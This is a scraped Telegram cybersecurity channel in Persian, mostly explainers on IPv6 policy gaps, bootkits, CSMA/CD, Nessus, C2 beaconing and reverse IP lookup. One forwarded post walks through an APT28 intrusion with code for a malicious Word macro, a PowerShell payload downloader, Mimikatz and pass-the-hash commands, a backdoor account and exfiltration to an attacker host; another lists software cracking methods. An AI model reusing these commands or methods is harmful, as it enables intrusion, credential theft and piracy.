ViperNułł – Telegram
ViperNułł
1.07K subscribers
90 photos
2 videos
24 files
94 links
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.

Pv ; @Cintaxed
Download Telegram
ViperNułł
@sec_netw🕷
📍یکی از نکات امنیتی بسیار مهم توی پروتکل های ipv4 و ipv6     
 
تجهیزات ما به طور پیش فرض از ipv6 پشتیبانی میکنن و حتی ممکنه روی فایروال ها روتر های ما بصورت پیشفرض فعال باشه. این قابلیت اگه بصورت صحیح مدیریت نشه میتونه باعث بشه که نفوذگران فرصت برای حمله ایجاد کنن
یعنی  وقتی که ما پالیسی های امنیتی خودمون رو روی ipv4 تعریف کنیم ( برای مثال acl یا قوانین فایروال برای محدود کردن ترافیک ورودی و خروجی که اعمال میکنیم ) این قوانین فقط برای ipv4 اعمال میشه.   اما اگه ipv6 به طور فعال روی تجهیزات شبکه ما فعال باشه  و ما قوانین امنیتی رو برای این پروتکول در نطر نگیریم مهاجمین میتونن با استفاده از ادرس های ipv6 به راحتی اون محدودیت های ipv4 رو دور بزنن  و به این ترتیب میتونن حمله های مختلفی مانند اسکن شبکه دسترسی به منابع حساس یا حتی حملات ddos رو بدون اینکه قوانین امنیتی ما اونارو شناسایی کنن به راحتی انجام بشن.     

  🔆 برای مثال اگه اتکر بتونه از ادرس ipv6 معتبر توی شبکه ما استفاده کنه این ادرس دربرابر قوانین فایروال ما برای ipv4 غیرقابل شناسایی میشه و در نتیجه تمامی ساست هایی که روی ipv4 تعریف کردیم به راحتی دور زده میشه  
    

راه حل ؛ اگه ما توی شبکه نیاز به استفاده از ipv6 نداریم مهم ترین اقدام اینه که این پروتکل رو غیرفعال بکنیم. غیرفعال کردن ipv6 باعث میشه که تجهیزات و فایروال ها تنها به ترافیک ipv4 توجه کنن و حملات از سمت ipv6 نخاهیم داشت  اما اگه از این پروتکل استفاده میکنید توصیه میکنم که فرایند های امنیتی رو این پروتکل هم انجام بدید  


و در اخر برسی و مدیریت صحیح پروتکول های مختلف شبکه و تنظیم پالیسی های امنیتی میتونه امنیت شبکه رو افزایش بده


@sec_netw🕷
🔥3
محققان سه آسیب‌پذیری خطرناک توی سوئیچ‌های WGS-804HPT که توی سیستم‌های اتوماسیون استفاده می‌شه پیدا کردن. این آسیب‌پذیری‌ها می‌تونن به مهاجم‌ها اجازه بدن که از راه دور کد دلخواه اجرا کنن 🟩

⤷ CVE-2024-52320 & CVE-2024-48871 : Critical 9.8

با یه درخواست HTTP مخرب، مهاجم‌ها می‌تونن سیستم رو هک کنن و کد دلخواه اجرا کنن

مثال عملی برای این آسیب پذیری

1️⃣شما توی یه شرکت کار می‌کنید و همه سیستم‌ها به همین  سوئیچ‌های WGS-804HPT وصلن

2️⃣یه مهاجم از اینترنت یا از بیرون میاد و با ارسال یه درخواست HTTP به سوئیچ‌ها می‌تونه شبکه رو دستکاری کنه

3️⃣حالا، چون سیستم شما به این شبکه وصل بوده، مهاجم می‌تونه به راحتی به دستگاه شما وارد بشه و اطلاعات رو بدزده یا حتی به دستگاه شما حمله کنه

4️⃣در نهایت، ممکنه ویندوز شما مستقیماً تحت تاثیر این آسیب‌پذیری‌ها نباشه، ولی اگه شبکه‌ای که بهش وصل هستید آسیب‌پذیر باشه، دستگاه شما هم ممکنه در معرض خطر قرار بگیره


 #آسیب_پذیری

@sec_netw🕷
👍3
Forwarded from Cyber Warfar
75836 Document.pdf
3.7 MB
⚠️ گزارش تحلیلی و آماری
⚠️ از حملات DDoS علیه زیرساخت‌های کشور در فصل پاییز 1403
⚠️ ارائه توسط شرکت ارتباطات زیرساخت

خلاصه این گزارش:

تعداد حمله‌ها: به صورت میانگین روزانه ۶۳۵ حمله، مجموعا ۵۷,۲۱۸ حمله
حجم حمله‌ها: میانگین ۳۶.۴۳ گیگابایت بر ثانیه و مجموعا ۱۲.۵۸ پتابایت در کل پاییز
میانگین مدت زمان حمله‌ها: ۴دقیقه و ۳۷ ثانیه
طولانی‌ترین حمله: ۴ روز و ۹ ساعت و ۵۰ دقیقه
بیشترین تعداد حمله هم‌زمان: ۱۴۸ حمله
منابع حمله‌ها: ۶۴ درصد حملات از ۱۰ کشور، بیش از ۱۵ درصد از روسیه، سپس اندونزی (۱۰٪) و اوکراین (۵٪)
روش‌ها: از هر ۱۰۰ حمله ۳۵ حمله (۳۵٪) از طریق شبکه دستگاه‌های آلوده (Bot Pool)
‌‌
هدف‌های با بیشترین حمله‌ها:
۱۸٪: شرکت‌های اینترنت سیار
۱۷٪: کسب‌وکارهای اینترنتی
۱۴٪: شرکت‌های اینترنت ثابت

مقاصد پرحمله: ۵۰۰ مقصد بیش از ۲۵۰ بار مورد حمله قرار گرفتند.
حمله‌های کوتاه و کم‌حجم: بیشترین حملات در محدوده زیر ۲ گیگابایت بر ثانیه و کمتر از ۵ دقیقه
سرویس‌های آسیب‌پذیر: اپراتورهای همراه، کسب‌وکارهای اینترنتی، اپراتورهای ثابت و درگاه‌های خدمات آنلاین

🚨 نقش دستگاه‌های آلوده: بسیاری از این حملات با استفاده از دستگاه‌های آلوده کاربران و بدون اطلاع آن‌ها انجام شده است.

🚨 نتیجه کلی: فیلترینگ گسترده و نصب اپلیکیشن‌های فیلترشکن مختلف توسط کاربرها (به ناچار)، نقش مهمی در در افزایش این حملات داشته است و دستگاه کاربرهای زیادی بدون اینکه بدانند، در این حمله‌ها مشارکت دارد!

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1
اپیزود 79 رادیو امنیت - پنج تهدید بزرگ بدافزارها برای سال 2025
liangroup.net
قسمت چهلم و ششم Safe Cast

خبرهای داغ :
🔹حذف بدافزار plugX توسط FBI
🔹کیت فیشینگ Sneaky 2FA روی حساب های Microsoft 365
🔹حمله بدافزار روسی به قزاقستان
🔹باج افزار RansomHub با Backdoor Python

زنگ خطر CVE های داغ هفته :
🔹Windows Hyper V NT Kernel Integration VSP
🔹Fortinet
🔹Apple macOS
🔹Kubernetes

دور دنیا در امنیت سایبری :
🔹طرح انگلستان جهت ممنوعیت پرداخت باج به هکرها
🔹نشت اطلاعات Gravy Analytics
🔹اتصال کارمندان شرکت ها به هکرها از طریق سرویس دارک وبی
🔹تکنیک PVC موثر در استخراج دیتا از حافظه Raspberry Pi

بخش اصلی :
💢 5 تهدید بزرگ Malware برای سال 2025 :
🔺Lumma
🔺XWorm
🔺AsyncRAT
🔺Remcos
🔺LockBit

🎙با اجرای رضا الفت

@safe_defense
#safe_cast
👍3
🔒 what is #Bootkit?
#بوت_کیت چیست؟

نوعی
#بدافزار مدرن برای اتصال نرم افزار های مخرب به سیستم های کامپیوتری
اغلب از ابزار های
#روت_کیت برای فرار از تشخیص استفاده میکنند
هدف این حملات UEFI# است
نرم‌افزاری که سیستم عامل کامپیوتر را به سخت افزار دستگاه متصل می‌کند.


#Rootkit vs Bootkit :تفاوت روت کیت و بوت کیت
روت کیت مجموعه ای از ابزار های نرم افزاری برای دادن کنترل از راه دور سیستم به مهاجمان طراحی
شده است
🔹به گونه ای ساخته شده که بدون تشخیص باقی بمانند.
🔹با غیر فعال کردن آنتی ویروس امکان نصب نرم افزار های مخرب را فراهم میکنند
🔹 با هدف حمله به امنیت شبکه یا برنامه‌ها به سیستم وارد می‌شوند.
🔻بوت کیت ها این فرآیند را یک قدم به جلو برده اند.برای آلوده کردن رکورد بوت طراحی شدند با این کار بوت کیت میتواند قبل از بارگذاری سیستم عامل اجرا شود.آلودگی های بوت کیت معمولا تشخیص داده نمیشوند زیرا تمام اجزای آن خارج از سیستم فایل ویندوز قرار دارند.
🔹برخی از نشانه‌های آلودگی بوت‌کیت شامل ناپایداری سیستم (مانند نمایش صفحه آبی) و عدم توانایی در راه‌اندازی سیستم عامل است.
____________________________________
🔐چرا بوت‌کیت‌ها یک تهدید امنیتی جدی هستند؟
بوت کیت خطرناک است چون حذف آن دشوار است به جای نوشته شدن روی هارد در مادربرد جاسازی شده
پیامد های وجود روت کیت در سیستم شما:
حذف فایل‌ها,دسترسی از راه دور,سرقت اطلاعات,نصب بدافزار های بیشتر

🔸پیشگیری از آلودگی به بوت‌کیت
سورس بوت: این ویژگی امنیتی تضمین می‌کند که سیستم فقط با نرم‌افزارهای مورد اعتماد راه‌اندازی شود.
اجتناب از رسانه‌های ناشناس(USB,CD,DVD,ISO,NETWORK): از بوت سیستم عامل از رسانه‌های ناشناس خودداری کنید.
به‌روزرسانی سیستم: همیشه سیستم عامل و فِرموِر(میان افزار) خود را به‌روز نگه دارید.


🔸حذف بوت‌کیت
حذف بوت‌کیت امکان‌پذیر است و نیاز به نرم‌افزارهای تخصصی حذف بدافزار دارد. حذف روت‌کیت‌ها اغلب آسان‌تر است، زیرا می‌توانید هارد دیسک خود را پاک کنید تا آن‌ها را حذف کنید. یافتن ابزار مناسب برای حذف آلودگی بوت‌کیت از سیستم شما بسیار مهم است.

🔸چگونه از شر بوت‌کیت‌ها خلاص شویم؟
نوع ابزاری که نیاز دارید، یک دیسک تعمیر بوت است که می‌تواند رکورد بوت اصلی (Master Boot Record) شما را پاک کند. این نرم‌افزار باید برای پاک‌کردن رکورد بوت اصلی استفاده شود، نه تعمیر آن. به این ترتیب می‌توانید مطمئن شوید که بوت‌کیت حذف شده است. پس از پاک‌کردن، می‌توانید یک رکورد بوت اصلی تمیز ایجاد کنید و پارتیشن‌های جدید درایو را فرمت کنید.

🔸از خود در برابر حملات بدافزاری محافظت کنید
با آگاهی از تهدیدات بدافزاری پنهان، می‌توانید کسب‌وکار خود را در برابر بوت‌کیت‌ها و سایر حملات روت‌کیت ایمن نگه دارید.
🔥3
CIS Controls Benchmarks.pdf
1.1 MB
عنوان مقاله: CIS Controls Benchmarks
نویسنده: هیژا خسروی (دانشجوی دوره Security+ آکادمی لیان)

💻 🔫🔫🔫🔫 🔫🔫🔫🔫🔫
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2👏1
Forwarded from Safe Defense 🇮🇷
تیم آبی در بررسی ترافیک شبکه متوجه میشه که بعضی endpointها در ساعات غیرکاری کانکشن‌های مداومی با یک IP ناشناس خارجی برقرار می‌کنند. این ارتباطات دارای الگوی Beaconing هستند و از پورت 443 استفاده می‌کنند. بهترین روش برای شناسایی و مهار این تهدید چیست؟
Final Results
17%
الف) استفاده از JA3/JA3S Fingerprinting برای شناسایی TLS Handshake‌های مشکوک
13%
ب) مسدود کردن تمامی ارتباطات خروجی روی پورت 443 تا بررسی کامل انجام شود
34%
ج) اعمال Deep Packet Inspection (DPI) روی تمامی ترافیک HTTPS برای شناسایی C2
35%
د) قرنطینه کردن سیستم‌های مشکوک و اجرای Forensic Analysis برای یافتن بدافزار
❤‍🔥2👍1
Forwarded from Safe Defense 🇮🇷
Safe Defense 🇮🇷
تیم آبی در بررسی ترافیک شبکه متوجه میشه که بعضی endpointها در ساعات غیرکاری کانکشن‌های مداومی با یک IP ناشناس خارجی برقرار می‌کنند. این ارتباطات دارای الگوی Beaconing هستند و از پورت 443 استفاده می‌کنند. بهترین روش برای شناسایی و مهار این تهدید چیست؟
پاسخ صحیح:

الف) استفاده از JA3/JA3S Fingerprinting برای شناسایی TLS Handshake‌های مشکوک


در کل Beaconing به ارتباطات مداوم و زمان‌بندی‌شده بین یک سیستم آلوده و سرور C2 گفته میشه. این نوع ترافیک معمولاً رمزگذاری شده (TLS/HTTPS) است و شناسایی اش بدون Decryption چالش‌برانگیزه.

ا JA3/JA3S Fingerprinting یک روش موثر برای تشخیص ارتباطات C2 مخفی‌شده در TLS Traffic است. تو این روش TLS Handshake تحلیل شده و بر اساس ویژگی‌هاش (مثل Cipher Suites, Extensions, TLS Version) یک Fingerprint منحصر‌به‌فرد تولید میشه.
خیلی از ابزارهای Red Teaming مثل Cobalt Strike, Empire, Meterpreter از الگوهای خاصی در TLS استفاده میکنند که میشه با JA3 شناسایی کرد.

چرا بقیه گزینه‌ها اشتباه یا کم‌ اثرند؟

ب) مسدود کردن تمامی ارتباطات خروجی روی پورت 443

غیرعملی و مخرب: پورت 443 رو مسدود کنید ارتباط سازمان با اینترنت قطع میشه .
از اونطرف هکرها میتونن از پورت‌های دیگه (مثلاً 53, 8443) استفاده کنند و این روش راه‌حل درست نیست.


ج) اعمال Deep Packet Inspection (DPI) روی تمامی ترافیک HTTPS

ببینید DPI بدون TLS Decryption فقط هدرهای اولیه رو بررسی میکنه و محتوای واقعی پکت‌ها رو نمیبینه.
تو TLS Decryption در مقیاس سازمانی کار پیچیده و پرهزینه ست و خیلی از سازمان‌ها به دلیل مسائل حریم خصوصی و عملکردی اون رو انجام نمیدن.

در JA3 میشه بدون نیاز به Decryption ارتباطات مشکوک رو شناسایی کرد.


د) قرنطینه کردن سیستم‌های مشکوک و اجرای Forensic Analysis

این روش واکنشی (Reactive) است، یعنی بعد از آلودگی سیستم انجام میشه.
در Forensic Analysis ضروریه اما باید به‌عنوان گام دوم بعد از شناسایی اولیه استفاده بشه.

نتیجه:

ا JA3/JA3S Fingerprinting بهترین روش برای شناسایی Beaconing Traffic در TLS است :
بدون نیاز به Decryption میتونه C2 Traffic رو تشخیص بده.
در برابر روش‌های مخفی‌سازی و Evasion مقاومه
با ابزارهایی مثل Zeek, Suricata و SIEM پیاده‌سازی میشه.

@safe_defense
#quiz
👍3
👍2
ViperNułł
@sec_netw🕷
پروتکول CSMA/CD در متد ارتباطی half duplex چیست؟  
--
پروتکول csma/cd مخفف
CSMA/CD (carrier   sense maltiple access / calition ditction )
که یک تکنولوژی در متد ارتباطی half duplex هست که با استاندارد IEE802.3 مشخص شده هست که برای جلوگیری از به وجود امدن تداخل در ارتباط دو دستگاه باهم استفاده میشه
--
متود ارتباطی half duplex طوریه که دیتا بین دو کامپیوتر بصورت هم زمان نمیتونه ارسال بشه و فقط یک کامپیوتر مجاز هست ارسال داده کنه و دریافت کننده باید زمانی شروع به ارسال کنه که خط خلوطه و ارسالی وجود نداره در غیر این صورت تداخل (calition) به وجود میاد ( یک بیسیم رو درنظر بگیرید که بصورت هم زمان نمیشه صحبت کرد )
--
تجهیز hup نمونه ای هست که از متد ارتباطی half duplex استفاده میکنه
و همچنین برخی از مودم های قدیمی dial-up و بیسیم ها از این متد ارتباطی استفاده میکنن
--
عملکرد csma/cd در متد ارتباطی half duplex
-شنود فعال  : هردستگاه پیش از آغاز انتقال داده،وضعیت رسانه را از نظر فعالیت سایر گره ها برسی میکنه
-اگر دیتایی وجود نداشته باشه ( عدم وجود سیگنال ارسالی ) ، فرآیند انتقال آغاز مسشه .
-درصورت مشغول بودن رسانه، دستگاه منتظر میمونه و پس از تشخیص انتقال رو شروع میکنه
--
ارسال داده و پایش همزمان ( Transmission with Detection )
-دستگاه در حین ارسال بسته ، بطور پیوسته سیگنال های دریافتی از رسانه را تحلیل میکنه
درحالت عادی سیگنال ارسالی باید با سیگنال دریافتی مطابقت داشته باشه در غیر این صورت تداخل (calition) تشخصی داده میشه
--
مدیریت برخورد
-درصورت تشخیص برخورد، دستگاه بلافاصله ارسال رو متوقف میکنه و یک سیگنال ارسال میکنه تا بقیه کلاینت ها از برخورد مطلع بشن
و بعد دستگاه وارد فاز انتظار تصادفی میشه  و یه زمانی تایین میشه .
و بعد از پایان زمان تلاش مجدد میکنه و فرایند کریر سنس رو اجرا میکنه و درصورت ازاد بودن انتقال از سر میگیره


@sec_netw🕷
👏3
🔥2
ViperNułł
@sec_netw🕷
نکاتی که زمان scan nessus باید بهش توجه کنیم !


1-اگه روی virtual machine اسکن اسیب پذیری با نرم افزار نسوس رو انجام میدیم حتما باید درحال bridged قرارش بدین به دلیل اینکه زمانی که روی host-only قرارش میدن امکانش هست که فایروال یکسری پورت هارو ببنده  و برای اسکن بهتر این گزینه رو روی های bridged قرار بدین

2-اصلا نباید هیچ نرم افزار امنیتی روی virtual machine  و os اصلیتون فعال باشه نرم افزار های مثل انتی ویروس و فایروال و... جلوی اسکن رو بخاطر شرایط‌امنیتی میگیرن و خروجی خوبی دریافت نخاهید کرد

3-نرم افزار نسوس میاد سرور های مارو از zone های مختلف اسکن میکنه اگه در ورودی فایروال ، ips و تجهیزات های امنیتی دیگه ای وجود داشته باشه جلوی اسکن رو میگرن  باید داخل این  تجهیزات رول بنویسیم که از سورس نسوس به تمامی سرویس ها و سیستم عامل های شبکمون ارتباط داشته باشه و حتی داخل نرم افزار انتی ویروس باید نرم افزار نسوس رو داخل white list قرارش بدیم

4-حتما در قسمت policy تب credentials یوزنیم و پسورد هر سیستم عامل رو بدین برای اسکن کامل و دقیق تر و اکه قصد دارین سرویس خاستی رو بهتر اسکن کنید از همین تب یوزر نیم و پسورد اون سرویس رو بدین چون درحالت عادی این اتفاق نمیفته و بیشتر روی خود سیستم عامل اسکن رو انجام میده


------- ودرآخر حتما بعد از اسکن رول هایی که نوشتید رو پاک کنید و درزمان استفاده دوباره رول بنویسید ------


@sec_netw🕷
3
Forwarded from Cyber Warfar
سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو یک: نفوذ به شبکه‌ وزارت امور خارجه آلمان با هدف جاسوسی از ارتباطات دولتی با بدافزار Seduploader

🔹 هدف:
نفوذ به سیستم‌های دیپلماتیک برای سرقت اطلاعات حساس
استقرار بدافزار برای مانیتورینگ و جمع‌آوری دیتاها
حرکت جانبی (Lateral Movement) برای گسترش حضور تو شبکه

🔹 گام 1: مهندسی اجتماعی و نفوذ اولیه
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر می‌رسیده از طرف یه سازمان بین‌المللی معتبر مثل EU External Action Service (EEAS) باشه.

فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده می‌کرده. بعد از باز شدن فایل، ماکرو فعال می‌شده و PowerShell رو برای دانلود بدافزار اجرا می‌کرده:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub


🔹 گام دو: دانلود و پیاده‌سازی بدافزار Seduploader
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاری‌شده بوده؛ بدافزار اصلی رو دانلود می‌کرده:
$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path

ویژگی‌های بدافزار Seduploader
- بررسی سیستم: اطلاعات اولیه (مثل نسخه‌ ویندوز، یوزرنیم، پردازنده) رو جمع‌آوری می‌کنه.
- اجرای دستورات از راه دور (Remote Command Execution)
- ثبت کلیدهای زده‌شده (Keylogging)
- آپلود و دانلود فایل‌های مخرب
- استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2

ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ری‌کوئست‌های DNS برای ارسال اطلاعات به سرور C2 استفاده می‌کنه:
nslookup -type=TXT x7c9.malicious-domain.com

دیتاها به صورت Base64 یا XOR Encoding انکریپت شده‌ان.

🔹 گام سه: حرکت جانبی (Lateral Movement)
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هش‌های رمزعبور استفاده کرده:
privilege::debug
sekurlsa::logonpasswords

دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستم‌ها
اعضای APT28 با استفاده از هش‌ها به سیستم‌های دیگه متصل می‌شدن:
psexec \\target-system -u administrator -p NTLMHASH cmd.exe

سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده می‌شده:
Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"


🔹 گام چهار: استخراج دیتاها (Exfiltration)
ارسال دیتاهای سرقت‌شده با پاورشل
$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes


🔹 نتیجه:
اعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
Forwarded from Nova Group
گروه Lazarus پشت حمله هکری دیروز به ByBit !

🔻اکنون این گروه هکری کره شمالی حتی از خود سازنده اتریوم، ویتالیک، ثروتمند تر است.

🆘 این حمله به روشی پیچیده انجام شده که شامل دستکاری در تراکنش‌ها و احتمالاً سوءاستفاده از فرآیند امضای چندگانه (multisig) بوده است به شرح زیر میباشد :

1. UI Spoofing:
حمله ممکن است از طریق "UI Spoofing" انجام شده باشد. این تکنیک شامل فریب دادن سیستم یا اپراتورها با نمایش اطلاعات جعلی در رابط کاربری است. در این سناریو، هکرها ممکن است رابط کاربری مربوط به تأیید تراکنش را دستکاری کرده باشند تا تراکنش مخرب به نظر قانونی بیاید و توسط سیستم یا اپراتور تأیید شود.


2. Sybil-like Attack:
هکرها ممکن است یک تراکنش جعلی یا شبیه‌سازی‌شده ایجاد کرده باشند که با امضاهای قانونی اشتباه گرفته شود. در حملات سیبیل، مهاجم هویت‌های جعلی متعددی ایجاد می‌کند تا سیستم را فریب دهد. در اینجا، ممکن است هکرها توانسته باشند امضاهای چندگانه مورد نیاز برای تأیید تراکنش را جعل یا دستکاری کنند



🌐https://www.bloomberg.com/news/articles/2025-02-21/bybit-hack

⭐️ @Nova_Groups_tech
🔥4
Forwarded from ReverseEngineering
کرک کردن نرم‌افزار یعنی دور زدن یا غیرفعال کردن مکانیزم‌های امنیتی یک نرم‌افزار برای استفاده بدون مجوز، روش‌های کرک کردن نرم‌افزار شامل موارد زیر میشه:

1 پچ کردن (Patching)

در این روش، فایل‌های اجرایی نرم‌افزار (مثل .exe یا .dll) دستکاری میشن تا مکانیزم‌های امنیتی مثل بررسی سریال یا لایسنس دور زده بشن معمولاً با ابزارهایی مثل OllyDbg، x64dbg یا IDA Pro انجام میشه

2 کیجن (Keygen)

کیجن (Key Generator) نرم‌افزاری است که یک سریال معتبر برای فعال‌سازی برنامه تولید می‌کنه معمولاً با تحلیل الگوریتم تولید کلید در نرم‌افزار اصلی ساخته میشه

3 سریال جعلی (Fake Serial)

بعضی از برنامه‌ها به‌صورت ساده یک سریال مشخص رو قبول میکنن کرکرها این سریال رو پیدا کرده و منتشر می‌کنن

4 امولیتور Dongle

بعضی نرم‌افزارها برای اجرا به یک دانگل سخت‌افزاری نیاز دارن کرکرها دانگل رو با نرم‌افزار شبیه‌سازی (emulator) جایگزین می‌کنند تا نرم‌افزار فکر کند دانگل متصله

5 مهندسی معکوس (Reverse Engineering)

در این روش، سورس‌کد باینری برنامه بررسی و تحلیل میشه تا مکانیزم امنیتی اون شناسایی و دور زده شه

6 تغییرات رجیستری

بعضی از نرم‌افزارها اطلاعات لایسنس رو در رجیستری ویندوز ذخیره می‌کنن با تغییر کلیدهای رجیستری میتونیم اون ها رو فعال کتیم

7 دور زدن سرور تأیید لایسنس (License Server Bypass)

در این روش، ارتباط نرم‌افزار با سرور لایسنس مسدود شده یا به یک سرور جعلی هدایت میشه که پاسخ‌های معتبر ارسال می‌کننه

8 دی‌کامپایل و اصلاح سورس کد

در برخی زبان‌های سطح بالا (مثل جاوا، پایتون، C#)، باینری‌های برنامه رو می‌تونیم دی‌کامپایل کنیم و مستقیما کد را تغییر بدیم

9 مانیتورینگ API

کرکرها با ابزارهایی مثل API Monitor یا Process Hacker درخواست‌های نرم‌افزار را بررسی میکنن تا بخش‌هایی که لایسنس رو بررسی می‌کند شناسایی و دستکاری کنن

10 حملات Brute Force

در برخی موارد که نرم‌افزار از مکانیزم‌های ساده‌ای برای اعتبارسنجی استفاده میکنه می‌تونیم با امتحان کردن ترکیب‌های مختلف، رمز عبور یا سریال صحیح رو پیدا کنیم
🔥6
Audio
🎤 پادکست وب هکینگ با استاد بهروز منصوری و رفیقمون ئاژان 📺


توی این پادکست، کلی نکته خفن درباره پیش‌نیازهای وب هکینگ و روش‌های درآمدزایی بهتر یاد گرفتیم! از تجربه‌های یه هکر قدیمی توی این حوزه استفاده کردیم و یاد گرفتیم چطوری یه رودمپ حرفه‌ای برای خودمون بچینیم تا با چند سال تلاش، به یه جایگاه عالی برسیم! 🚀

➡️ برای آشنایی بیشتر، حتما سری به وب‌سایت استاد بهروز منصوری بزنید و دوره‌هایی که داخل پادکست پیشنهاد شد رو اونجا ببینید

Marzban.net


امیدوارم از این پادکست نهایت لذت ببرید! 🎧🔥




 
#پادکست #وب_هکینگ #بهروز_منصوری

کانال  MR.369 ❤️‍🔥
📺
@MR_369_963
🔥5
شماره پورت هایی که لازمه بدونید

@sec_netw🕷
🔥4👏2👍1
Forwarded from ReverseEngineering
Practical_reverse_engineering_x86,_x64,_ARM,_Windows_Kernel,_reversing.pdf
4.6 MB
این کتاب شامل تمرین‌ها و راه‌حل‌هایی با ویروس‌ها و روت‌کیت‌های واقعی و مخربه نویسندگان این کتاب عمدا این کار رو انجام دادن تا اطمینان پیدا کنن که خوانندگان می‌تونن فورا مهارت‌های که یاد گرفتن خودشون استفاده کنن نمونه‌های بدافزار به ترتیب حروف الفبا (نمونه A، B، C، …)
انواع معماری رو هم میگه Arm x64 x86
❤‍🔥6
ViperNułł
@sec_netw
🛑چگونه متوجه شویم چه دامنه‌هایی روی یک IP خاص ثبت شده‌اند؟ 

بررسی دامنه‌های مرتبط با یک آدرس ایپی (Reverse IP Lookup)
یکی از روش‌های رایج برای شناسایی وب‌سایت‌ها یا سرویس‌هایی است که روی یک سرور مشترک میزبانی می‌شوند. این فرآیند به شما کمک می‌کند تا با وارد کردن یک آدرس IP، لیستی از دامنه‌های متصل به آن را پیدا کنید. در این مقاله، با روش‌ها و ابزارهای انجام این کار آشنا می‌شوید.


🗯وب سایت هایی که فرایند Reverse ip Lookup رو انجام میدن عبارتند از ؛

1- Domain tools
Aderess :  https://www.domaintools.com

- نحوه کار: 
   - وارد وب‌سایت Domain Tools شوید. 
   - از منوی بالای صفحه، گزینه Reverse IP Lookup را انتخاب کنید. 
   - آدرس IP مورد نظر خود را وارد کرده و روی Search کلیک کنید. 
   - لیست دامنه‌های مرتبط با آن IP نمایش داده می‌شود. 
- ویژگی‌ها: 
  - ارائه اطلاعات دقیق درباره مالک IP و تاریخچه دامنه. 
  - امکان مشاهده دامنه‌های فعال و غیرفعال. 

2-MXToolBox 
Aderess: https://mxtoolbox.com
- نحوه کار: 
  - وارد بخش Reverse IP Lookup شوید. 
  - ایپی مورد نظر را وارد کرده و روی Reverse Lookup کلیک کنید. 
  - لیست دامنه‌ها و رکوردهای DNS مرتبط نمایش داده می‌شود. 
- ویژگی‌ها: 
  - رایگان و سریع. 
  - امکان بررسی وضعیت سرور (Online/Offline). 

3-SecurityTrails 
Aderess:
https://securitytrails.com
- نحوه کار: 
  - در بخش Search، گزینه IP را انتخاب کنید. 
  - آدرس IP را وارد کرده و Enter بزنید. 
  - در قسمت Hosted Domains، دامنه‌های مرتبط با IP نمایش داده می‌شود. 
- ویژگی‌ها: 
  - ارائه جزئیات امنیتی مانند تاریخچه DNS و اطلاعات سرور. 

4-ViewDNS.info 
aderess: https://viewdns.info
- نحوه کار: 
  - از منوی Tools، گزینه Reverse IP Lookup را انتخاب کنید. 
  - ایپی را وارد کرده و روی Lookup کلیک کنید. 
- ویژگی‌ها: 
  - رابط کاربری ساده و رایگان. 



@sec_netw🕷
❤‍🔥3